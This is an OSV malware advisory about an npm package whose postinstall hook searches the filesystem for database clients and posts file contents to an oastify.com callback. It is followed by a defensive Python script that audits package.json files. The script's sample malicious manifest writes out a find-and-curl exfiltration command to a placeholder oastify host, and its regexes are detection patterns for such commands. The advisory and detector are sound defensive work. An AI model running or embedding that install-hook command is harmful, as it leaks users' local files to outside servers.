dttfdsdee@1.0.6

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 6:49 PM UTC

Malicious

OSV ID

MAL-2026-6498

Ecosystem

npm

Summary

package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate database client binaries (mysql, mongo, mongosh, psql, redis-cli, sqlite3, elasticsearch), writes the results to /data/db_clients_check.txt, and then uses curl -X POST to send local file contents to an out-of-band callback at http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com (oastify.com is the Burp Collaborator OOB interaction domain). The package presents itself as a generic string-utility helper with benign filler in index.js, but that advertised purpose is wholly inconsistent with the install-time behavior. The metadata is hollow (empty author, empty repository, empty homepage) and the name is a random string, which is consistent with disposable reconnaissance bait. Installing the package on a developer or CI machine causes immediate filesystem reconnaissance and exfiltration to attacker-controlled infrastructure.

Source: amazon-inspector (ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c)
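As an added example (not part of the OSV record and not the code of any scanner named above), the following Python script audits a package.json for the pattern this advisory describes: lifecycle hooks that npm runs automatically at install time, hook commands that walk the filesystem or POST data to an out-of-band callback domain, and hollow author/repository/homepage metadata. The indicator labels, the two sample manifests and the placeholder callback hostname are constructed for this example; only oastify.com as a Burp Collaborator domain comes from the advisory.

```python
import json
import re

# Lifecycle hooks that npm executes without any user action during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators modelled on the behaviour in the advisory above (labels are ours).
INDICATORS = {
    "filesystem-wide find": re.compile(r"\bfind\s+/(\s|$)"),
    "http post via curl/wget": re.compile(
        r"\b(curl\b.*(-X\s*POST|--data|-d\s|-F\s|-T\s)|wget\b.*--post-)"),
    "oob callback domain": re.compile(r"\b(oastify\.com|burpcollaborator\.net)\b"),
    "local file fed into request": re.compile(r"@/|\$\(cat\s"),
}

HOLLOW_FIELDS = ("author", "repository", "homepage")


def _is_empty(value):
    """Treat '', None and {'type': 'git', 'url': ''} alike as empty metadata."""
    if isinstance(value, dict):
        return _is_empty(value.get("url", ""))
    return not str(value or "").strip()


def audit_package_json(text):
    """Return a structured report for one package.json document (a JSON string)."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    report = {"install_hooks": [], "indicators": [], "hollow_metadata": False}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        report["install_hooks"].append(hook)
        for label, rx in INDICATORS.items():
            if rx.search(cmd):
                report["indicators"].append((hook, label))
    # All three descriptive fields empty is the 'hollow metadata' signal.
    report["hollow_metadata"] = all(_is_empty(pkg.get(f)) for f in HOLLOW_FIELDS)
    return report


def verdict(report):
    """Map a report to a policy decision for a dependency-review gate."""
    if report["indicators"] or (report["install_hooks"] and report["hollow_metadata"]):
        return "block"      # exfiltration indicators, or hollow package with install hooks
    if report["install_hooks"]:
        return "review"     # install hooks deserve a human look even when they seem benign
    return "ok"


# Constructed sample manifests (not real packages). The callback hostname is a placeholder.
SAMPLE_MALICIOUS = json.dumps({
    "name": "xqzptrlwv",
    "version": "1.0.0",
    "description": "string utility helpers",
    "author": "",
    "repository": "",
    "homepage": "",
    "scripts": {
        "postinstall": "find / -name psql > /tmp/c.txt; "
                       "curl -X POST -d @/tmp/c.txt http://PLACEHOLDER.oastify.com/"
    },
})

SAMPLE_BENIGN = json.dumps({
    "name": "string-helpers-example",
    "version": "2.0.0",
    "author": "Example Maintainer",
    "repository": {"type": "git", "url": "https://example.com/repo.git"},
    "homepage": "https://example.com",
    "scripts": {"test": "node test.js", "postinstall": "node scripts/download-prebuilt.js"},
})

if __name__ == "__main__":
    for label, manifest in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        rep = audit_package_json(manifest)
        print(label, verdict(rep), rep)
```

Run the script over each package.json under node_modules after a dry-run install, or feed it the manifests fetched from the registry before installation. Pair it with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) on CI runners, so that a hook like the one in this advisory never executes even if it slips past the check.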
